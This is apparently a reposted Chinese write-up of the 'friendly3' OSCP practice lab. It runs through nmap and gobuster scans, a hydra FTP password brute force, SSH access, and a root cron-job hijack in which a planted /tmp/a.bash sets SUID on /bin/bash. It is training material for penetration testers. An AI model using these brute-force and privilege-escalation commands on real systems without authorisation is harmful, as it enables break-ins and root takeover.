【OSCP】friendly3

admin 2024年10月12日09:53:07评论17 views字数 1790阅读5分58秒阅读模式
【OSCP】friendly3

OSCP 靶场

【OSCP】friendly3

靶场介绍

friendly3

easy

信息收集、ftp 爆破、hydra 使用、定时任务提权、文件篡改

信息收集

主机发现

nmap -sn 192.168.1.0/24

【OSCP】friendly3

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -p- -T4 192.168.1.60
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-28 04:20 EST
Nmap scan report for 192.168.1.60
Host is up (0.00038s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 9.2p1 Debian 2 (protocol 2.0)
80/tcp open http nginx 1.22.1
MAC Address: 08:00:27:A0:C2:38 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.70 seconds

【OSCP】friendly3

目录扫描

┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.60
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/direc
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.60/index.html (Status: 200) [Size: 355]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
==========

权限获取

hydra -l juan -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.60

【OSCP】friendly3

成功登录到ftp ,但是并没有什么可利用的信息,通过账号密码登录ssh

【OSCP】friendly3

【OSCP】friendly3

权限提升

下载pspy64 查看执行的进程可以发下定时任务执行了如下脚本

【OSCP】friendly3

【OSCP】friendly3

我们查看该脚本内容如下,脚本中会执行a.bash脚本,我们可以篡改脚本实现权限提升即可。

【OSCP】friendly3

我们在/tmp下创建a.bash 脚本,然后输入如下内容,将bash 添加suid 权限,然后通过bash 进行提权。

nano a.bash

#!/bin/bash
chmod +s /bin/bash

【OSCP】friendly3

【OSCP】friendly3

End

“点赞、在看与分享都是莫大的支持”

【OSCP】friendly3

【OSCP】friendly3

原文始发于微信公众号(贝雷帽SEC):【OSCP】friendly3

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月12日09:53:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP】friendly3https://cn-sec.com/archives/3256450.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息